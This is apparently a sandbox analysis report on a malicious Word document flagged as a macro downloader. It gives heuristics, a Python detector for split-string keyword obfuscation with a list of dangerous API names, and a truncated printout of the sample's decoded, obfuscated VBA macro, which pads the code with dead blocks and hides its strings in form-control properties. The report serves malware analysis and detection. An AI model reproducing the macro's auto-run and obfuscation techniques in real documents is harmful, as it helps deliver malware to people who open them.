Verdict: MALICIOUS (risk score 262)

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1059 Command and Scripting Interpreter
The sample contains VBA macros, including a Document_Open auto-execution macro, so the code runs as soon as the document is opened with macros enabled; this is a common delivery technique for malicious Office documents. The critical heuristic OLE_VBA_SPLIT_KEYWORD_OBFUSCATION reports that the dangerous name 'winmgmts' (the WMI moniker, which lets a macro start a process through Win32_Process without ever calling Shell or WScript.Shell) was reassembled from split string literals, something that is done only to evade keyword scanning. Together with the ClamAV Doc.Downloader.Generic signature and the structure of the macro, this strongly suggests the document is designed to fetch and execute a secondary payload. Note that the only URL recovered statically is an OOXML schema namespace, so the download target is not visible in this report and is presumably assembled at runtime.
Heuristics (7)

- critical CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Generic-7450222-0
- medium OLE_VBA_MACROS: Document contains VBA macro code (4 related findings)
- critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION: Dangerous API name reassembled from split string literals. VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- high OLE_VBA_DOCOPEN: Document_Open macro (runs automatically when the document is opened with macros enabled)
- high OLE_VBA_CREATEOBJ: CreateObject call
- high OLE_VBA_PCODE_AUTOEXEC_EXEC: VBA p-code auto-exec with execution tokens. The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- info EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard OOXML DrawingML namespace URI and appears in any document that embeds drawing markup; it is not a download location.
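To make the split-keyword heuristic concrete, here is an added Python example, written for this write-up and not part of the analyzer's code, that scans VBA source for runs of concatenated string literals, joins them, and reports dangerous names that appear only in the joined text, next to the Document_Open and CreateObject checks reported above. The heuristic IDs are taken from the report; the name list, the matching rules and the sample macro are assumptions made for this example.

```python
"""Source-level check for split-keyword obfuscation in VBA macros.

Added example, not the analyzer's own implementation.  The heuristic IDs
match the report above; everything else (name list, regexes, sample) is
an assumption of this example.
"""
import re

# Names a macro has no honest reason to assemble piecewise (assumed list).
DANGEROUS_NAMES = (
    "winmgmts", "wscript.shell", "shell.application",
    "scripting.filesystemobject", "msxml2.xmlhttp", "adodb.stream",
    "urldownloadtofile", "powershell", "mshta", "rundll32", "cmd.exe",
)

# One VBA string literal; an embedded quote is written as "".
LITERAL = re.compile(r'"((?:[^"]|"")*)"')
# Two or more literals joined by & or +, optionally across a " _" line
# continuation, e.g.  "win" & "mg" & _ <newline> "mts:"
CONCAT_RUN = re.compile(r'"(?:[^"]|"")*"(?:\s*[&+]\s*(?:_\s*)?"(?:[^"]|"")*")+')
DOC_OPEN = re.compile(r"\bSub\s+Document_Open\s*\(", re.I)
CREATE_OBJECT = re.compile(r"\bCreateObject\s*\(", re.I)


def reassembled_keywords(vba: str) -> list[dict]:
    """Return dangerous names that exist only after concatenating literals.

    A name already present in a single literal is left to plain keyword
    scanning; this check fires only when no fragment contains it.
    """
    findings = []
    for run in CONCAT_RUN.finditer(vba):
        parts = [p.replace('""', '"') for p in LITERAL.findall(run.group(0))]
        joined = "".join(parts).lower()
        for name in DANGEROUS_NAMES:
            if name in joined and not any(name in p.lower() for p in parts):
                findings.append({
                    "name": name,
                    "parts": parts,
                    "line": vba.count("\n", 0, run.start()) + 1,
                })
    return findings


def triage(vba: str) -> list[str]:
    """Map the checks onto the heuristic IDs used in the report."""
    hits = []
    if DOC_OPEN.search(vba):
        hits.append("OLE_VBA_DOCOPEN")
    if CREATE_OBJECT.search(vba):
        hits.append("OLE_VBA_CREATEOBJ")
    if reassembled_keywords(vba):
        hits.append("OLE_VBA_SPLIT_KEYWORD_OBFUSCATION")
    return sorted(hits)


# Constructed sample macro: it only shows a message box, but builds the WMI
# moniker and the WScript.Shell ProgID the way the report describes.
SAMPLE_VBA = r'''
Private Sub Document_Open()
    Dim prov As String
    prov = "win" & "mg" & _
           "mts:"
    Set svc = GetObject(prov & "Win32_Process")
    Set sh = CreateObject("WScr" + "ipt.Sh" + "ell")
    Set fso = CreateObject("Scripting.FileSystemObject")
    MsgBox "done"
End Sub
'''

if __name__ == "__main__":
    for f in reassembled_keywords(SAMPLE_VBA):
        print(f"line {f['line']}: {f['name']!r} from {f['parts']}")
    print(triage(SAMPLE_VBA))
```

Run directly, it reports winmgmts on the continued line and WScript.Shell inside the CreateObject call, while the single-literal Scripting.FileSystemObject is deliberately left to ordinary keyword scanning. The check covers literal concatenation only: strings built from Chr() calls or, as in this sample, read out of form-control properties such as ControlTipText need the control data itself inspected, and when source extraction fails entirely the p-code heuristic above is what remains.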
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8821 bytes | 6729fc00c8eab85d55821735a1ba57f0ba1336588888a836803111a6f7f2c63b |
Preview script (first 1,000 lines of the extracted script). Three modules are visible: the document module `Pvgunbtuci`, which hosts an MSForms TextBox control named `Xcjexgswkuyr`; a form module `Hqmmnmulg`, whose members are read below as control properties; and a standard module `Waafqzyrjky`. The repeated `Select Case` blocks compare undeclared variables with each other and assign constants to variables that are never read again; without `Option Explicit` these are all Empty variants, so the blocks are dead code inserted to pad and randomise the source. The live path is short: `Document_open` ends by calling `Yftkvtrkwiz` (outside the preview), and `Ubvbzxwkkql` concatenates the TextBox contents with form properties such as `Hqmmnmulg.Zxdtohfzcoeq.ControlTipText`, wrapping the result in `Bsdvfezppu` on both sides. The strings that matter are therefore stored in form-control properties and assembled only at runtime, so a keyword scan over the visible source sees at most fragments.
```vba
Attribute VB_Name = "Pvgunbtuci"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Xcjexgswkuyr, 0, 0, MSForms, TextBox"
Private Sub Document_open()
    Select Case Kipxwxyoms
        Case Xbzrvmkyryd
            ISxdk951 = AWN
            FKNpk15B = 23
            WPOtp5 = 2
        Case 926
            dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Dlbnhowskl)))
            bqmax1u = 6969
            QnqF67ZsD = CLng(kXja6)
        Case Emaehrmap
            OZb = 6532
            pPcg1diH = biJruQ0
            AOni9uk0 = Round(Ozwwzgumegns)
    End Select
    Select Case Fuhzftez
        Case Twvtxmjnn
            ISxdk951 = AWN
            FKNpk15B = 23
            WPOtp5 = 2
        Case 926
            dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Fstyhmflruijk)))
            bqmax1u = 6969
            QnqF67ZsD = CLng(kXja6)
        Case Aksxgpbxbqh
            OZb = 6532
            pPcg1diH = biJruQ0
            AOni9uk0 = Round(Arfyaeacna)
    End Select
    Select Case Widcdkqgrqw
        Case Yomqatbnp
            ISxdk951 = AWN
            FKNpk15B = 23
            WPOtp5 = 2
        Case 926
            dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Jupoyuowzn)))
            bqmax1u = 6969
            QnqF67ZsD = CLng(kXja6)
        Case Vyzubkhzdagiu
            OZb = 6532
            pPcg1diH = biJruQ0
            AOni9uk0 = Round(Djrchhstju)
    End Select
    Yftkvtrkwiz
End Sub

Attribute VB_Name = "Hqmmnmulg"
Attribute VB_Base = "0{42A26798-B370-4406-BEA3-E619CD9E3CF6}{2C76240B-0F89-4184-B23C-854AA39A3581}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Waafqzyrjky"
Function Ubvbzxwkkql()
    Select Case Phdskylqtunq
        Case Eslhxfsfsloac
            ISxdk951 = AWN
            FKNpk15B = 23
            WPOtp5 = 2
        Case 926
            dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Dwvsnylixw)))
            bqmax1u = 6969
            QnqF67ZsD = CLng(kXja6)
        Case Ytpllebakvs
            OZb = 6532
            pPcg1diH = biJruQ0
            AOni9uk0 = Round(Bjprdkwkhp)
    End Select
    Swpbvvoxo = Pvgunbtuci.Xcjexgswkuyr
    Select Case Iwvbvzvkhokj
        Case Ozjipyskf
            ISxdk951 = AWN
            FKNpk15B = 23
            WPOtp5 = 2
        Case 926
            dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Dsrntyzdy)))
            bqmax1u = 6969
            QnqF67ZsD = CLng(kXja6)
        Case Qgvzbiqnlc
            OZb = 6532
            pPcg1diH = biJruQ0
            AOni9uk0 = Round(Cjpmjezxqwxrg)
    End Select
    Njzvqyppdvny = Swpbvvoxo + Hqmmnmulg.Bikrocwwbxyh + Hqmmnmulg.Vbwdbrtdh + Hqmmnmulg.Mimvysqnb
    Select Case Lnffkttteoyas
        Case Pwislcvpkgx
            ISxdk951 = AWN
            FKNpk15B = 23
            WPOtp5 = 2
        Case 926
            dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Qzowujdhero)))
            bqmax1u = 6969
            QnqF67ZsD = CLng(kXja6)
        Case Cjqpfxrbyzkrh
            OZb = 6532
            pPcg1diH = biJruQ0
            AOni9uk0 = Round(Xuzmdcceabg)
    End Select
    Nzsabfjv = Njzvqyppdvny + Hqmmnmulg.Mjkvqfyl + Hqmmnmulg.Zxdtohfzcoeq.ControlTipText
    Select Case Tjljrpvjpzvr
        Case Otmgzqdwvqty
            ISxdk951 = AWN
            FKNpk15B = 23
            WPOtp5 = 2
        Case 926
            dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Pfyhtaalnrv)))
            bqmax1u = 6969
            QnqF67ZsD = CLng(kXja6)
        Case Hkimoupbesz
            OZb = 6532
            pPcg1diH = biJruQ0
            AOni9uk0 = Round(Pxnvqtogtk)
    End Select
    Ubvbzxwkkql = Bsdvfezppu + Nzsabfjv + Bsdvfezppu
    Select Case Njsgceeavet
    ... (truncated)
```